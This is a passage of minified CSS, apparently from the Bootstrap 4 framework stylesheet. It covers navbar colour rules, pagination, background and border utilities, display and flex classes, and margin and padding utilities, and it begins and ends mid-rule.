.navbar-nav .nav-link:focus,.navbar-light .navbar-nav .nav-link:hover{color:rgba(0,0,0,.7)}.navbar-light .navbar-nav .nav-link.disabled{color:rgba(0,0,0,.3)}.navbar-light .navbar-nav .active>.nav-link,.navbar-light .navbar-nav .nav-link.active,.navbar-light .navbar-nav .nav-link.show,.navbar-light .navbar-nav .show>.nav-link{color:rgba(0,0,0,.9)}.navbar-light .navbar-toggler{color:rgba(0,0,0,.5);border-color:rgba(0,0,0,.1)}.navbar-light .navbar-toggler-icon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='30' height='30' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%280, 0, 0, 0.5%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 
15h22M4 23h22'/%3e%3c/svg%3e")}.navbar-light .navbar-text{color:rgba(0,0,0,.5)}.navbar-light .navbar-text a{color:rgba(0,0,0,.9)}.navbar-light .navbar-text a:focus,.navbar-light .navbar-text a:hover{color:rgba(0,0,0,.9)}.navbar-dark .navbar-brand{color:#fff}.navbar-dark .navbar-brand:focus,.navbar-dark .navbar-brand:hover{color:#fff}.navbar-dark .navbar-nav .nav-link{color:rgba(255,255,255,.5)}.navbar-dark .navbar-nav .nav-link:focus,.navbar-dark .navbar-nav .nav-link:hover{color:rgba(255,255,255,.75)}.navbar-dark .navbar-nav .nav-link.disabled{color:rgba(255,255,255,.25)}.navbar-dark .navbar-nav .active>.nav-link,.navbar-dark .navbar-nav .nav-link.active,.navbar-dark .navbar-nav .nav-link.show,.navbar-dark .navbar-nav .show>.nav-link{color:#fff}.navbar-dark .navbar-toggler{color:rgba(255,255,255,.5);border-color:rgba(255,255,255,.1)}.navbar-dark .navbar-toggler-icon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='30' height='30' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%28255, 255, 255, 0.5%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e")}.navbar-dark .navbar-text{color:rgba(255,255,255,.5)}.navbar-dark .navbar-text a{color:#fff}.navbar-dark .navbar-text a:focus,.navbar-dark .navbar-text a:hover{color:#fff}.pagination{display:flex;padding-left:0;list-style:none;border-radius:.25rem}.page-link{position:relative;display:block;padding:.5rem .75rem;margin-left:-1px;line-height:1.25;color:#007bff;background-color:#fff;border:1px solid #dee2e6}.page-link:hover{z-index:2;color:#0056b3;text-decoration:none;background-color:#e9ecef;border-color:#dee2e6}.page-link:focus{z-index:3;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.page-item:first-child .page-link{margin-left:0;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.page-item:last-child .page-link{border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.page-item.active .page-link{z-index:3;color:#fff;background-color:#007bff;border-color:#007bff}.page-item.disabled .page-link{color:#6c757d;pointer-events:none;cursor:auto;background-color:#fff;border-color:#dee2e6}.pagination-lg .page-link{padding:.75rem 1.5rem;font-size:1.25rem;line-height:1.5}.pagination-lg .page-item:first-child .page-link{border-top-left-radius:.3rem;border-bottom-left-radius:.3rem}.pagination-lg .page-item:last-child .page-link{border-top-right-radius:.3rem;border-bottom-right-radius:.3rem}.pagination-sm .page-link{padding:.25rem .5rem;font-size:.875rem;line-height:1.5}.pagination-sm .page-item:first-child .page-link{border-top-left-radius:.2rem;border-bottom-left-radius:.2rem}.pagination-sm .page-item:last-child 
.page-link{border-top-right-radius:.2rem;border-bottom-right-radius:.2rem}.align-baseline{vertical-align:baseline!important}.align-top{vertical-align:top!important}.align-middle{vertical-align:middle!important}.align-bottom{vertical-align:bottom!important}.align-text-bottom{vertical-align:text-bottom!important}.align-text-top{vertical-align:text-top!important}.bg-primary{background-color:#007bff!important}a.bg-primary:focus,a.bg-primary:hover,button.bg-primary:focus,button.bg-primary:hover{background-color:#0062cc!important}.bg-secondary{background-color:#6c757d!important}a.bg-secondary:focus,a.bg-secondary:hover,button.bg-secondary:focus,button.bg-secondary:hover{background-color:#545b62!important}.bg-success{background-color:#28a745!important}a.bg-success:focus,a.bg-success:hover,button.bg-success:focus,button.bg-success:hover{background-color:#1e7e34!important}.bg-info{background-color:#17a2b8!important}a.bg-info:focus,a.bg-info:hover,button.bg-info:focus,button.bg-info:hover{background-color:#117a8b!important}.bg-warning{background-color:#ffc107!important}a.bg-warning:focus,a.bg-warning:hover,button.bg-warning:focus,button.bg-warning:hover{background-color:#d39e00!important}.bg-danger{background-color:#dc3545!important}a.bg-danger:focus,a.bg-danger:hover,button.bg-danger:focus,button.bg-danger:hover{background-color:#bd2130!important}.bg-light{background-color:#f8f9fa!important}a.bg-light:focus,a.bg-light:hover,button.bg-light:focus,button.bg-light:hover{background-color:#dae0e5!important}.bg-dark{background-color:#343a40!important}a.bg-dark:focus,a.bg-dark:hover,button.bg-dark:focus,button.bg-dark:hover{background-color:#1d2124!important}.bg-white{background-color:#fff!important}.bg-transparent{background-color:transparent!important}.border{border:1px solid #dee2e6!important}.border-top{border-top:1px solid #dee2e6!important}.border-right{border-right:1px solid #dee2e6!important}.border-bottom{border-bottom:1px solid #dee2e6!important}.border-left{border-left:1px solid 
#dee2e6!important}.border-0{border:0!important}.border-top-0{border-top:0!important}.border-right-0{border-right:0!important}.border-bottom-0{border-bottom:0!important}.border-left-0{border-left:0!important}.border-primary{border-color:#007bff!important}.border-secondary{border-color:#6c757d!important}.border-success{border-color:#28a745!important}.border-info{border-color:#17a2b8!important}.border-warning{border-color:#ffc107!important}.border-danger{border-color:#dc3545!important}.border-light{border-color:#f8f9fa!important}.border-dark{border-color:#343a40!important}.border-white{border-color:#fff!important}.rounded-sm{border-radius:.2rem!important}.rounded{border-radius:.25rem!important}.rounded-top{border-top-left-radius:.25rem!important;border-top-right-radius:.25rem!important}.rounded-right{border-top-right-radius:.25rem!important;border-bottom-right-radius:.25rem!important}.rounded-bottom{border-bottom-right-radius:.25rem!important;border-bottom-left-radius:.25rem!important}.rounded-left{border-top-left-radius:.25rem!important;border-bottom-left-radius:.25rem!important}.rounded-lg{border-radius:.3rem!important}.rounded-circle{border-radius:50%!important}.rounded-pill{border-radius:50rem!important}.rounded-0{border-radius:0!important}.clearfix::after{display:block;clear:both;content:""}.d-none{display:none!important}.d-inline{display:inline!important}.d-inline-block{display:inline-block!important}.d-block{display:block!important}.d-table{display:table!important}.d-table-row{display:table-row!important}.d-table-cell{display:table-cell!important}.d-flex{display:flex!important}.d-inline-flex{display:inline-flex!important}@media (min-width:576px){.d-sm-none{display:none!important}.d-sm-inline{display:inline!important}.d-sm-inline-block{display:inline-block!important}.d-sm-block{display:block!important}.d-sm-table{display:table!important}.d-sm-table-row{display:table-row!important}.d-sm-table-cell{display:table-cell!important}.d-sm-flex{display:flex!important}.d-sm-inline-flex{display:inline-flex!important}}@media (min-width:768px){.d-md-none{display:none!important}.d-md-inline{display:inline!important}.d-md-inline-block{display:inline-block!important}.d-md-block{display:block!important}.d-md-table{display:table!important}.d-md-table-row{display:table-row!important}.d-md-table-cell{display:table-cell!important}.d-md-flex{display:flex!important}.d-md-inline-flex{display:inline-flex!important}}@media (min-width:992px){.d-lg-none{display:none!important}.d-lg-inline{display:inline!important}.d-lg-inline-block{display:inline-block!important}.d-lg-block{display:block!important}.d-lg-table{display:table!important}.d-lg-table-row{display:table-row!important}.d-lg-table-cell{display:table-cell!important}.d-lg-flex{display:flex!important}.d-lg-inline-flex{display:inline-flex!important}}@media (min-width:1200px){.d-xl-none{display:none!important}.d-xl-inline{display:inline!important}.d-xl-inline-block{display:inline-block!important}.d-xl-block{display:block!important}.d-xl-table{display:table!important}.d-xl-table-row{display:table-row!important}.d-xl-table-cell{display:table-cell!important}.d-xl-flex{display:flex!important}.d-xl-inline-flex{display:inline-flex!important}}@media 
print{.d-print-none{display:none!important}.d-print-inline{display:inline!important}.d-print-inline-block{display:inline-block!important}.d-print-block{display:block!important}.d-print-table{display:table!important}.d-print-table-row{display:table-row!important}.d-print-table-cell{display:table-cell!important}.d-print-flex{display:flex!important}.d-print-inline-flex{display:inline-flex!important}}.embed-responsive{position:relative;display:block;width:100%;padding:0;overflow:hidden}.embed-responsive::before{display:block;content:""}.embed-responsive .embed-responsive-item,.embed-responsive embed,.embed-responsive iframe,.embed-responsive object,.embed-responsive video{position:absolute;top:0;bottom:0;left:0;width:100%;height:100%;border:0}.embed-responsive-21by9::before{padding-top:42.85714286%}.embed-responsive-16by9::before{padding-top:56.25%}.embed-responsive-4by3::before{padding-top:75%}.embed-responsive-1by1::before{padding-top:100%}.flex-row{flex-direction:row!important}.flex-column{flex-direction:column!important}.flex-row-reverse{flex-direction:row-reverse!important}.flex-column-reverse{flex-direction:column-reverse!important}.flex-wrap{flex-wrap:wrap!important}.flex-nowrap{flex-wrap:nowrap!important}.flex-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-fill{flex:1 1 auto!important}.flex-grow-0{flex-grow:0!important}.flex-grow-1{flex-grow:1!important}.flex-shrink-0{flex-shrink:0!important}.flex-shrink-1{flex-shrink:1!important}.justify-content-start{justify-content:flex-start!important}.justify-content-end{justify-content:flex-end!important}.justify-content-center{justify-content:center!important}.justify-content-between{justify-content:space-between!important}.justify-content-around{justify-content:space-around!important}.align-items-start{align-items:flex-start!important}.align-items-end{align-items:flex-end!important}.align-items-center{align-items:center!important}.align-items-baseline{align-items:baseline!important}.align-items-stretch{align-items:stretch!important}.align-content-start{align-content:flex-start!important}.align-content-end{align-content:flex-end!important}.align-content-center{align-content:center!important}.align-content-between{align-content:space-between!important}.align-content-around{align-content:space-around!important}.align-content-stretch{align-content:stretch!important}.align-self-auto{align-self:auto!important}.align-self-start{align-self:flex-start!important}.align-self-end{align-self:flex-end!important}.align-self-center{align-self:center!important}.align-self-baseline{align-self:baseline!important}.align-self-stretch{align-self:stretch!important}@media (min-width:576px){.flex-sm-row{flex-direction:row!important}.flex-sm-column{flex-direction:column!important}.flex-sm-row-reverse{flex-direction:row-reverse!important}.flex-sm-column-reverse{flex-direction:column-reverse!important}.flex-sm-wrap{flex-wrap:wrap!important}.flex-sm-nowrap{flex-wrap:nowrap!important}.flex-sm-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-sm-fill{flex:1 1 
auto!important}.flex-sm-grow-0{flex-grow:0!important}.flex-sm-grow-1{flex-grow:1!important}.flex-sm-shrink-0{flex-shrink:0!important}.flex-sm-shrink-1{flex-shrink:1!important}.justify-content-sm-start{justify-content:flex-start!important}.justify-content-sm-end{justify-content:flex-end!important}.justify-content-sm-center{justify-content:center!important}.justify-content-sm-between{justify-content:space-between!important}.justify-content-sm-around{justify-content:space-around!important}.align-items-sm-start{align-items:flex-start!important}.align-items-sm-end{align-items:flex-end!important}.align-items-sm-center{align-items:center!important}.align-items-sm-baseline{align-items:baseline!important}.align-items-sm-stretch{align-items:stretch!important}.align-content-sm-start{align-content:flex-start!important}.align-content-sm-end{align-content:flex-end!important}.align-content-sm-center{align-content:center!important}.align-content-sm-between{align-content:space-between!important}.align-content-sm-around{align-content:space-around!important}.align-content-sm-stretch{align-content:stretch!important}.align-self-sm-auto{align-self:auto!important}.align-self-sm-start{align-self:flex-start!important}.align-self-sm-end{align-self:flex-end!important}.align-self-sm-center{align-self:center!important}.align-self-sm-baseline{align-self:baseline!important}.align-self-sm-stretch{align-self:stretch!important}}@media (min-width:768px){.flex-md-row{flex-direction:row!important}.flex-md-column{flex-direction:column!important}.flex-md-row-reverse{flex-direction:row-reverse!important}.flex-md-column-reverse{flex-direction:column-reverse!important}.flex-md-wrap{flex-wrap:wrap!important}.flex-md-nowrap{flex-wrap:nowrap!important}.flex-md-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-md-fill{flex:1 1 auto!important}.flex-md-grow-0{flex-grow:0!important}.flex-md-grow-1{flex-grow:1!important}.flex-md-shrink-0{flex-shrink:0!important}.flex-md-shrink-1{flex-shrink:1!important}.justify-content-md-start{justify-content:flex-start!important}.justify-content-md-end{justify-content:flex-end!important}.justify-content-md-center{justify-content:center!important}.justify-content-md-between{justify-content:space-between!important}.justify-content-md-around{justify-content:space-around!important}.align-items-md-start{align-items:flex-start!important}.align-items-md-end{align-items:flex-end!important}.align-items-md-center{align-items:center!important}.align-items-md-baseline{align-items:baseline!important}.align-items-md-stretch{align-items:stretch!important}.align-content-md-start{align-content:flex-start!important}.align-content-md-end{align-content:flex-end!important}.align-content-md-center{align-content:center!important}.align-content-md-between{align-content:space-between!important}.align-content-md-around{align-content:space-around!important}.align-content-md-stretch{align-content:stretch!important}.align-self-md-auto{align-self:auto!important}.align-self-md-start{align-self:flex-start!important}.align-self-md-end{align-self:flex-end!important}.align-self-md-center{align-self:center!important}.align-self-md-baseline{align-self:baseline!important}.align-self-md-stretch{align-self:stretch!important}}@media 
(min-width:992px){.flex-lg-row{flex-direction:row!important}.flex-lg-column{flex-direction:column!important}.flex-lg-row-reverse{flex-direction:row-reverse!important}.flex-lg-column-reverse{flex-direction:column-reverse!important}.flex-lg-wrap{flex-wrap:wrap!important}.flex-lg-nowrap{flex-wrap:nowrap!important}.flex-lg-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-lg-fill{flex:1 1 auto!important}.flex-lg-grow-0{flex-grow:0!important}.flex-lg-grow-1{flex-grow:1!important}.flex-lg-shrink-0{flex-shrink:0!important}.flex-lg-shrink-1{flex-shrink:1!important}.justify-content-lg-start{justify-content:flex-start!important}.justify-content-lg-end{justify-content:flex-end!important}.justify-content-lg-center{justify-content:center!important}.justify-content-lg-between{justify-content:space-between!important}.justify-content-lg-around{justify-content:space-around!important}.align-items-lg-start{align-items:flex-start!important}.align-items-lg-end{align-items:flex-end!important}.align-items-lg-center{align-items:center!important}.align-items-lg-baseline{align-items:baseline!important}.align-items-lg-stretch{align-items:stretch!important}.align-content-lg-start{align-content:flex-start!important}.align-content-lg-end{align-content:flex-end!important}.align-content-lg-center{align-content:center!important}.align-content-lg-between{align-content:space-between!important}.align-content-lg-around{align-content:space-around!important}.align-content-lg-stretch{align-content:stretch!important}.align-self-lg-auto{align-self:auto!important}.align-self-lg-start{align-self:flex-start!important}.align-self-lg-end{align-self:flex-end!important}.align-self-lg-center{align-self:center!important}.align-self-lg-baseline{align-self:baseline!important}.align-self-lg-stretch{align-self:stretch!important}}@media (min-width:1200px){.flex-xl-row{flex-direction:row!important}.flex-xl-column{flex-direction:column!important}.flex-xl-row-reverse{flex-direction:row-reverse!important}.flex-xl-column-reverse{flex-direction:column-reverse!important}.flex-xl-wrap{flex-wrap:wrap!important}.flex-xl-nowrap{flex-wrap:nowrap!important}.flex-xl-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-xl-fill{flex:1 1 
auto!important}.flex-xl-grow-0{flex-grow:0!important}.flex-xl-grow-1{flex-grow:1!important}.flex-xl-shrink-0{flex-shrink:0!important}.flex-xl-shrink-1{flex-shrink:1!important}.justify-content-xl-start{justify-content:flex-start!important}.justify-content-xl-end{justify-content:flex-end!important}.justify-content-xl-center{justify-content:center!important}.justify-content-xl-between{justify-content:space-between!important}.justify-content-xl-around{justify-content:space-around!important}.align-items-xl-start{align-items:flex-start!important}.align-items-xl-end{align-items:flex-end!important}.align-items-xl-center{align-items:center!important}.align-items-xl-baseline{align-items:baseline!important}.align-items-xl-stretch{align-items:stretch!important}.align-content-xl-start{align-content:flex-start!important}.align-content-xl-end{align-content:flex-end!important}.align-content-xl-center{align-content:center!important}.align-content-xl-between{align-content:space-between!important}.align-content-xl-around{align-content:space-around!important}.align-content-xl-stretch{align-content:stretch!important}.align-self-xl-auto{align-self:auto!important}.align-self-xl-start{align-self:flex-start!important}.align-self-xl-end{align-self:flex-end!important}.align-self-xl-center{align-self:center!important}.align-self-xl-baseline{align-self:baseline!important}.align-self-xl-stretch{align-self:stretch!important}}.float-left{float:left!important}.float-right{float:right!important}.float-none{float:none!important}@media (min-width:576px){.float-sm-left{float:left!important}.float-sm-right{float:right!important}.float-sm-none{float:none!important}}@media (min-width:768px){.float-md-left{float:left!important}.float-md-right{float:right!important}.float-md-none{float:none!important}}@media (min-width:992px){.float-lg-left{float:left!important}.float-lg-right{float:right!important}.float-lg-none{float:none!important}}@media (min-width:1200px){.float-xl-left{float:left!important}.float-xl-right{float:right!important}.float-xl-none{float:none!important}}.user-select-all{user-select:all!important}.user-select-auto{user-select:auto!important}.user-select-none{user-select:none!important}.overflow-auto{overflow:auto!important}.overflow-hidden{overflow:hidden!important}.position-static{position:static!important}.position-relative{position:relative!important}.position-absolute{position:absolute!important}.position-fixed{position:fixed!important}.position-sticky{position:sticky!important}.fixed-top{position:fixed;top:0;right:0;left:0;z-index:1030}.fixed-bottom{position:fixed;right:0;bottom:0;left:0;z-index:1030}@supports (position:sticky){.sticky-top{position:sticky;top:0;z-index:1020}}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;overflow:visible;clip:auto;white-space:normal}.shadow-sm{box-shadow:0 .125rem .25rem rgba(0,0,0,.075)!important}.shadow{box-shadow:0 .5rem 1rem rgba(0,0,0,.15)!important}.shadow-lg{box-shadow:0 1rem 3rem 
rgba(0,0,0,.175)!important}.shadow-none{box-shadow:none!important}.w-25{width:25%!important}.w-50{width:50%!important}.w-75{width:75%!important}.w-100{width:100%!important}.w-auto{width:auto!important}.h-25{height:25%!important}.h-50{height:50%!important}.h-75{height:75%!important}.h-100{height:100%!important}.h-auto{height:auto!important}.mw-100{max-width:100%!important}.mh-100{max-height:100%!important}.min-vw-100{min-width:100vw!important}.min-vh-100{min-height:100vh!important}.vw-100{width:100vw!important}.vh-100{height:100vh!important}.m-0{margin:0!important}.mt-0,.my-0{margin-top:0!important}.mr-0,.mx-0{margin-right:0!important}.mb-0,.my-0{margin-bottom:0!important}.ml-0,.mx-0{margin-left:0!important}.m-1{margin:.25rem!important}.mt-1,.my-1{margin-top:.25rem!important}.mr-1,.mx-1{margin-right:.25rem!important}.mb-1,.my-1{margin-bottom:.25rem!important}.ml-1,.mx-1{margin-left:.25rem!important}.m-2{margin:.5rem!important}.mt-2,.my-2{margin-top:.5rem!important}.mr-2,.mx-2{margin-right:.5rem!important}.mb-2,.my-2{margin-bottom:.5rem!important}.ml-2,.mx-2{margin-left:.5rem!important}.m-3{margin:1rem!important}.mt-3,.my-3{margin-top:1rem!important}.mr-3,.mx-3{margin-right:1rem!important}.mb-3,.my-3{margin-bottom:1rem!important}.ml-3,.mx-3{margin-left:1rem!important}.m-4{margin:1.5rem!important}.mt-4,.my-4{margin-top:1.5rem!important}.mr-4,.mx-4{margin-right:1.5rem!important}.mb-4,.my-4{margin-bottom:1.5rem!important}.ml-4,.mx-4{margin-left:1.5rem!important}.m-5{margin:3rem!important}.mt-5,.my-5{margin-top:3rem!important}.mr-5,.mx-5{margin-right:3rem!important}.mb-5,.my-5{margin-bottom:3rem!important}.ml-5,.mx-5{margin-left:3rem!important}.p-0{padding:0!important}.pt-0,.py-0{padding-top:0!important}.pr-0,.px-0{padding-right:0!important}.pb-0,.py-0{padding-bottom:0!important}.pl-0,.px-0{padding-left:0!important}.p-1{padding:.25rem!important}.pt-1,.py-1{padding-top:.25rem!important}.pr-1,.px-1{padding-right:.25rem!important}.pb-1,.py-1{padding-bottom:.25rem!important}.pl-1,.px-1{padding-left:.25rem!important}.p-2{padding:.5rem!important}.pt-2,.py-2{padding-top:.5rem!important}.pr-2,.px-2{padding-right:.5rem!important}.pb-2,.py-2{padding-bottom:.5rem!important}.pl-2,.px-2{padding-left:.5rem!important}.p-3{padding:1rem!important}.pt-3,.py-3{padding-top:1rem!important}.pr-3,.px-3{padding-right:1rem!important}.pb-3,.py-3{padding-bottom:1rem!important}.pl-3,.px-3{padding-left:1rem!important}.p-4{padding:1.5rem!important}.pt-4,.py-4{padding-top:1.5rem!important}.pr-4,.px-4{padding-right:1.5rem!important}.pb-4,.py-4{padding-bottom:1.5rem!important}.pl-4,.px-4{padding-left:1.5rem!important}.p-5{padding:3rem!important}.pt-5,.py-5{padding-top:3rem!important}.pr-5,.px-5{padding-right:3rem!important}.pb-5,.py-5{padding-bottom:3rem!important}.pl-5,.px-5{padding-left:3rem!important}.m-n1{margin:-.25rem!important}.mt-n1,.my-n1{margin-top:-.25rem!important}.mr-n1,.mx-n1{margin-right:-.25rem!important}.mb-n1,.my-n1{margin-bottom:-.25rem!important}.ml-n1,.mx-n1{margin-left:-.25rem!important}.m-n2{margin:-.5rem!important}.mt-n2,.my-n2{margin-top:-.5rem!important}.mr-n2,.mx-n2{margin-right:-.5rem!important}.mb-n2,.my-n2{margin-bottom:-.5rem!important}.ml-n2,.mx-n2{margin-left:-.5rem!important}.m-n3{margin:-1rem!important}.mt-n3,.my-n3{margin-top:-1rem!important}.mr-n3,.mx-n3{margin-right:-1rem!important}.mb-n3,.my-n3{margin-bottom:-1rem!important}.ml-n3,.mx-n3{margin-left:-1rem!important}.m-n4{margin:-1.5rem!important}.mt-n4,.my-n4{margin-top:-1.5rem!important}.mr-n4,.mx-n4{margin-right:-1.5rem!important}.mb-n4,.
my-n4{margin-bottom:-1.5rem!important}.ml-n4,.mx-n4{margin-left:-1.5rem!important}.m-n5{margin:-3rem!important}.mt-n5,.my-n5{margin-top:-3rem!important}.mr-n5,.mx-n5{margin-right:-3rem!important}.mb-n5,.my-n5{margin-bottom:-3rem!important}.ml-n5,.mx-n5{margin-left:-3rem!important}.m-auto{margin:auto!important}.mt-auto,.my-auto{margin-top:auto!important}.mr-auto,.mx-auto{margin-right:auto!important}.mb-auto,.my-auto{margin-bottom:auto!important}.ml-auto,.mx-auto{margin-left:auto!important}@media (min-width:576px){.m-sm-0{margin:0!important}.mt-sm-0,.my-sm-0{margin-top:0!important}.mr-sm-0,.mx-sm-0{margin-right:0!important}.mb-sm-0,.my-sm-0{margin-bottom:0!important}.ml-sm-0,.mx-sm-0{margin-left:0!important}.m-sm-1{margin:.25rem!important}.mt-sm-1,.my-sm-1{margin-top:.25rem!important}.mr-sm-1,.mx-sm-1{margin-right:.25rem!important}.mb-sm-1,.my-sm-1{margin-bottom:.25rem!important}.ml-sm-1,.mx-sm-1{margin-left:.25rem!important}.m-sm-2{margin:.5rem!important}.mt-sm-2,.my-sm-2{margin-top:.5rem!important}.mr-sm-2,.mx-sm-2{margin-right:.5rem!important}.mb-sm-2,.my-sm-2{margin-bottom:.5rem!important}.ml-sm-2,.mx-sm-2{margin-left:.5rem!important}.m-sm-3{margin:1rem!important}.mt-sm-3,.my-sm-3{margin-top:1rem!important}.mr-sm-3,.mx-sm-3{margin-right:1rem!important}.mb-sm-3,.my-sm-3{margin-bottom:1rem!important}.ml-sm-3,.mx-sm-3{margin-left:1rem!important}.m-sm-4{margin:1.5rem!important}.mt-sm-4,.my-sm-4{margin-top:1.5rem!important}.mr-sm-4,.mx-sm-4{margin-right:1.5rem!important}.mb-sm-4,.my-sm-4{margin-bottom:1.5rem!important}.ml-sm-4,.mx-sm-4{margin-left:1.5rem!important}.m-sm-5{margin:3rem!important}.mt-sm-5,.my-sm-5{margin-top:3rem!important}.mr-sm-5,.mx-sm-5{margin-right:3rem!important}.mb-sm-5,.my-sm-5{margin-bottom:3rem!important}.ml-sm-5,.mx-sm-5{margin-left:3rem!important}.p-sm-0{padding:0!important}.pt-sm-0,.py-sm-0{padding-top:0!important}.pr-sm-0,.px-sm-0{padding-right:0!important}.pb-sm-0,.py-sm-0{padding-bottom:0!important}.pl-sm-0,.px-sm-0{padding-left:0!important}.p-sm-1{padding:.25rem!important}.pt-sm-1,.py-sm-1{padding-top:.25rem!important}.pr-sm-1,.px-sm-1{padding-right:.25rem!important}.pb-sm-1,.py-sm-1{padding-bottom:.25rem!important}.pl-sm-1,.px-sm-1{padding-left:.25rem!important}.p-sm-2{padding:.5rem!important}.pt-sm-2,.py-sm-2{padding-top:.5rem!important}.pr-sm-2,.px-sm-2{padding-right:.5rem!important}.pb-sm-2,.py-sm-2{padding-bottom:.5rem!important}.pl-sm-2,.px-sm-2{padding-left:.5rem!important}.p-sm-3{padding:1rem!important}.pt-sm-3,.py-sm-3{padding-top:1rem!important}.pr-sm-3,.px-sm-3{padding-right:1rem!important}.pb-sm-3,.py-sm-3{padding-bottom:1rem!important}.pl-sm-3,.px-sm-3{padding-left:1rem!important}.p-sm-4{padding:1.5rem!important}.pt-sm-4,.py-sm-4{padding-top:1.5rem!important}.pr-sm-4,.px-sm-4{padding-right:1.5rem!important}.pb-sm-4,.py-sm-4{padding-bottom:1.5rem!important}.pl-sm-4,.px-sm-4{padding-left:1.5rem!important}.p-sm-5{padding:3rem!important}.pt-sm-5,.py-sm-5{padding-top:3rem!important}.pr-sm-5,.px-sm-5{padding-right:3rem!important}.pb-sm-5,.py-sm-5{padding-bottom:3rem!important}.pl-sm-5,.px-sm-5{padding-left:3rem!important}.m-sm-n1{margin:-.25rem!important}.mt-sm-n1,.my-sm-n1{margin-top:-.25rem!important}.mr-sm-n1,.mx-sm-n1{margin-right:-.25rem!important}.mb-sm-n1,.my-sm-n1{margin-bottom:-.25rem!important}.ml-sm-n1,.mx-sm-n1{margin-left:-.25rem!important}.m-sm-n2{margin:-.5rem!important}.mt-sm-n2,.my-sm-n2{margin-top:-.5rem!important}.mr-sm-n2,.mx-sm-n2{margin-right:-.5rem!important}.mb-sm-n2,.my-sm-n2{margin-bottom:-.5rem!important}.ml-sm-n2,.mx-sm-n2{margi
n-left:-.5rem!important}.m-sm-n3{margin:-1rem!important}.mt-sm-n3,.my-sm-n3{margin-top:-1rem!important}.mr-sm-n3,.mx-sm-n3{margin-right:-1rem!important}.mb-sm-n3,.my-sm-n3{margin-bottom:-1rem!important}.ml-sm-n3,.mx-sm-n3{margin-left:-1rem!important}.m-sm-n4{margin:-1.5rem!important}.mt-sm-n4,.my-sm-n4{margin-top:-1.5rem!important}.mr-sm-n4,.mx-sm-n4{margin-right:-1.5rem!important}.mb-sm-n4,.my-sm-n4{margin-bottom:-1.5rem!important}.ml-sm-n4,.mx-sm-n4{margin-left:-1.5rem!important}.m-sm-n5{margin:-3rem!important}.mt-sm-n5,.my-sm-n5{margin-top:-3rem!important}.mr-sm-n5,.mx-sm-n5{margin-right:-3rem!important}.mb-sm-n5,.my-sm-n5{margin-bottom:-3rem!important}.ml-sm-n5,.mx-sm-n5{margin-left:-3rem!important}.m-sm-auto{margin:auto!important}.mt-sm-auto,.my-sm-auto{margin-top:auto!important}.mr-sm-auto,.mx-sm-auto{margin-right:auto!important}.mb-sm-auto,.my-sm-auto{margin-bottom:auto!important}.ml-sm-auto,.mx-sm-auto{margin-left:auto!important}}@media (min-width:768px){.m-md-0{margin:0!important}.mt-md-0,.my-md-0{margin-top:0!important}.mr-md-0,.mx-md-0{margin-right:0!important}.mb-md-0,.my-md-0{margin-bottom:0!important}.ml-md-0,.mx-md-0{margin-left:0!important}.m-md-1{margin:.25rem!important}.mt-md-1,.my-md-1{margin-top:.25rem!important}.mr-md-1,.mx-md-1{margin-right:.25rem!important}.mb-md-1,.my-md-1{margin-bottom:.25rem!important}.ml-md-1,.mx-md-1{margin-left:.25rem!important}.m-md-2{margin:.5rem!important}.mt-md-2,.my-md-2{margin-top:.5rem!important}.mr-md-2,.mx-md-2{margin-right:.5rem!important}.mb-md-2,.my-md-2{margin-bottom:.5rem!important}.ml-md-2,.mx-md-2{margin-left:.5rem!important}.m-md-3{margin:1rem!important}.mt-md-3,.my-md-3{margin-top:1rem!important}.mr-md-3,.mx-md-3{margin-right:1rem!important}.mb-md-3,.my-md-3{margin-bottom:1rem!important}.ml-md-3,.mx-md-3{margin-left:1rem!important}.m-md-4{margin:1.5rem!important}.mt-md-4,.my-md-4{margin-top:1.5rem!important}.mr-md-4,.mx-md-4{margin-right:1.5rem!important}.mb-md-4,.my-md-4{margin-bottom:1.5rem!important}.ml-md-4,.mx-md-4{margin-left:1.5rem!important}.m-md-5{margin:3rem!important}.mt-md-5,.my-md-5{margin-top:3rem!important}.mr-md-5,.mx-md-5{margin-right:3rem!important}.mb-md-5,.my-md-5{margin-bottom:3rem!important}.ml-md-5,.mx-md-5{margin-left:3rem!important}.p-md-0{padding:0!important}.pt-md-0,.py-md-0{padding-top:0!important}.pr-md-0,.px-md-0{padding-right:0!important}.pb-md-0,.py-md-0{padding-bottom:0!important}.pl-md-0,.px-md-0{padding-left:0!important}.p-md-1{padding:.25rem!important}.pt-md-1,.py-md-1{padding-top:.25rem!important}.pr-md-1,.px-md-1{padding-right:.25rem!important}.pb-md-1,.py-md-1{padding-bottom:.25rem!important}.pl-md-1,.px-md-1{padding-left:.25rem!important}.p-md-2{padding:.5rem!important}.pt-md-2,.py-md-2{padding-top:.5rem!important}.pr-md-2,.px-md-2{padding-right:.5rem!important}.pb-md-2,.py-md-2{padding-bottom:.5rem!important}.pl-md-2,.px-md-2{padding-left:.5rem!important}.p-md-3{padding:1rem!important}.pt-md-3,.py-md-3{padding-top:1rem!important}.pr-md-3,.px-md-3{padding-right:1rem!important}.pb-md-3,.py-md-3{padding-bottom:1rem!important}.pl-md-3,.px-md-3{padding-left:1rem!important}.p-md-4{padding:1.5rem!important}.pt-md-4,.py-md-4{padding-top:1.5rem!important}.pr-md-4,.px-md-4{padding-right:1.5rem!important}.pb-md-4,.py-md-4{padding-bottom:1.5rem!important}.pl-md-4,.px-md-4{padding-left:1.5rem!important}.p-md-5{padding:3rem!important}.pt-md-5,.py-md-5{padding-top:3rem!important}.pr-md-5,.px-md-5{padding-right:3rem!important}.pb-md-5,.py-md-5{padding-bottom:3